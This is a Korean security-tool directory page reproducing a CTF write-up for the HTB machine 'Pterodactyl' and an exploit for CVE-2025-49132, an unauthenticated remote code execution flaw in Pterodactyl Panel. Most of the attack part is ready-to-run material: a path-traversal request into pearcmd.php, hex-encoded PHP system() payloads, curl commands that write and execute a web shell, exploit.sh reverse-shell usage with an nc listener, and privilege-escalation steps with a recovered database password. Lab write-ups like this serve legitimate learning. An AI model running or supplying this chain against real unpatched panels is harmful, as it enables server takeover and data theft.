Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-49132_HTB_SEASON10 | Kitploit
도구/GitHubGitHub/nik123-py/cve-2025-49132_htb_season10
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubnik123-py/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-49132 - Pterodactyl 패널 RCE 익스플로잇

HTB 시즌 10 - Pterodactyl 머신 라이트업

개요

대상: Pterodactyl HTB 머신 (중간 난이도)
CVE: CVE-2025-49132
심각도: 치명적 (CVSS 9.8)
공격 유형: 인증되지 않은 원격 코드 실행
영향: Pterodactyl 패널 < v1.11.11

이 익스플로잇 체인은 다음을 결합합니다:

  1. 경로 탐색 - 로케일 번역 시스템 내
  2. PEAR 명령 주입 - pearcmd.php 경유
  3. PHP 코드 실행 - 파일 쓰기 + include를 통해

버그

Pterodactyl 패널의 /locales/locale.json 엔드포인트는 locale 매개변수를 통한 경로 탐색을 허용합니다:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

이는 PEAR의 pearcmd.php와 연결하여 다음을 수행할 수 있습니다:

  1. 임의의 PHP 파일을 /tmp에 작성
  2. 다른 요청을 통해 해당 파일 실행

작동 원리

PEAR(PHP 확장 및 애플리케이션 저장소) 에는 다음과 같은 CLI 도구(pearcmd.php)가 있습니다:

  • URL 매개변수를 통해 명령을 허용합니다(CLI 전용으로 설계됨)
  • 파일을 작성하는 config-create 명령이 있습니다
  • 웹을 통해 호출할 때 인증이 없습니다

익스플로잇 체인:

root@kitploit:~
Path Traversal → Load pearcmd.php → Inject PHP via config-create → Execute malicious PHP

Hex2bin() 트릭

명령은 hex2bin()을 사용하여 16진수로 인코딩되어 다음을 우회합니다:

  • URL 인코딩 문제
  • 특수 문자 필터
  • Nginx/PHP 파싱 문제

예시:

root@kitploit:~
Command: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

원격 코드 실행

방법 1: 제공된 exploit.sh 사용

root@kitploit:~
chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

방법 2: 수동 익스플로잇

root@kitploit:~
# Step 1: Write PHP shell (hex-encoded "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"

# Step 2: Execute
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"

방법 3: Python 스크립트

root@kitploit:~
I added exploit.py
**Install requests**

🛠️ 제공 도구

1. exploit.sh (권장)

모든 기능을 갖춘 bash 익스플로잇

root@kitploit:~
./exploit.sh cmd "whoami"           # Execute single command
./exploit.sh shell 10.10.14.21 4444 # Reverse shell
./exploit.sh flag                   # Find user flag

기능:

  • 안정성을 위한 Hex2bin() 인코딩
  • Python 기반 출력 필터링
  • 여러 셸 방식 (bash TCP + mkfifo)
  • 깔끔하고 파싱된 출력

2. CVE-2025-49132_DETAILED.txt

포괄적인 기술 문서

포함 내용:

  • 취약점 심층 분석
  • PEAR 아키텍처 설명
  • 단계별 익스플로잇 분석
  • 문제 해결 가이드
  • 탐지 방법 (IOC)
  • 완화 전략

빠른 시작

root@kitploit:~
# 1. Add to /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts

# 2. Download exploit
wget https://your-repo/exploit.sh
chmod +x exploit.sh

# 3. Get shell
nc -lvnp 4444  # Terminal 1
./exploit.sh shell 10.10.14.21 4444  # Terminal 2

# 4. Get user flag
cat /home/phileasfogg3/user.txt

권한 상승

열거

root@kitploit:~
# Check running services
ss -tlnp

# Found:
# 127.0.0.1:3306 - MySQL (root)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (root)
# 127.0.0.1:25   - Postfix

# Check sudo
sudo -l
# (Likely requires password)

# SUID binaries
find / -perm -4000 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

일반적인 PrivEsc 벡터

  1. 알려진 자격 증명을 사용한 MySQL
root@kitploit:~
mysql -u pterodactyl -pPteraPanel
# Check for UDF injection, file write perms
  1. root로 실행되는 PHP-FPM
root@kitploit:~
# Check for FPM exploitation (CVE-2019-11043 or config abuse)
  1. Redis 익스플로잇
root@kitploit:~
# Check for auth bypass, RCE via cron
redis-cli -h 127.0.0.1
  1. cron에서 쓰기 가능한 스크립트 확인
root@kitploit:~
find /etc/cron* -writable 2>/dev/null
  1. 커널 익스플로잇 (최후의 수단)
root@kitploit:~
uname -a
# Check for DirtyCow, etc.

참고 자료

CVE 및 익스플로잇

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

기술 자료

  • Pterodactyl 패널 문서
  • PEAR 문서
  • OWASP 경로 탐색

도구 다운로드